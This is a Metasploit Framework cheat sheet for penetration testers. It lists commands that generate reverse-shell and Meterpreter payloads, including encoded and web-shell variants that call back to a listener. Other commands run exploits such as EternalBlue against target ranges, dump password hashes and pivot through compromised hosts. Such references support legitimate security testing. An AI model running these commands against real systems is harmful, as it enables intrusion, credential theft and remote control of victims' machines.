ENNAENNA

Metasploit Cheat Sheet

The Metasploit Framework for penetration testing, exploit development, and post-exploitation. Covers msfconsole navigation, payload generation, exploit usage, and post-exploitation modules.

View Metasploit Framework tool page

MSFConsole Basics

Start Metasploit console in quiet mode without the banner

$ msfconsole -q

Search for Windows SMB exploits in the module database

$ search type:exploit platform:windows smb

Find excellent-ranked exploits by CVE year

$ search cve:2021 rank:excellent

Select the multi-handler module for catching reverse shells

$ use exploit/multi/handler

Display detailed information about a specific module

$ info exploit/windows/smb/ms17_010_eternalblue

Payloads

Generate a Windows 64-bit Meterpreter reverse TCP executable

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o shell.exe

Generate a Linux reverse shell ELF binary

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o shell.elf

Generate encoded HTTPS Meterpreter with 5 encoding iterations

$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -e x64/xor_dynamic -i 5 -o payload.exe

Generate a PHP Meterpreter web shell

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o shell.php

List all available Meterpreter payload variants

$ msfvenom --list payloads | grep meterpreter

Running Exploits

Configure target hosts, port, and execute the selected exploit

$ set RHOSTS 192.168.1.0/24 set RPORT 445 run

Configure payload with callback address and port

$ set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 10.10.10.10 set LPORT 4444

Check if the target is vulnerable without exploiting it

$ check

Run the exploit as a background job

$ exploit -j

List all active sessions (shells and meterpreter)

$ sessions -l

Post-Exploitation

Interact with session ID 1

$ sessions -i 1

Suggest local privilege escalation exploits for the target

$ run post/multi/recon/local_exploit_suggester

Dump password hashes from a compromised Windows host

$ run post/windows/gather/hashdump

Add a route through a compromised host for pivoting

$ run post/multi/manage/autoroute SUBNET=10.0.0.0/24

Enumerate currently and recently logged-on users

$ run post/windows/gather/enum_logged_on_users

Handlers & Listeners

Set up a background listener for reverse TCP Meterpreter

$ use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 4444 exploit -j

Start a SOCKS proxy server for pivoting through sessions

$ use auxiliary/server/socks_proxy set SRVHOST 127.0.0.1 set SRVPORT 1080 run -j

HTTPS listener with custom SSL certificate for stealth

$ use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_https set LHOST 0.0.0.0 set LPORT 443 set HandlerSSLCert cert.pem exploit -j

More Cheat Sheets

Nmap Cheat Sheet

6 sections

Hashcat Cheat Sheet

5 sections

SQLMap Cheat Sheet

5 sections

ffuf Cheat Sheet

5 sections

Nuclei Cheat Sheet

5 sections

Subfinder Cheat Sheet

4 sections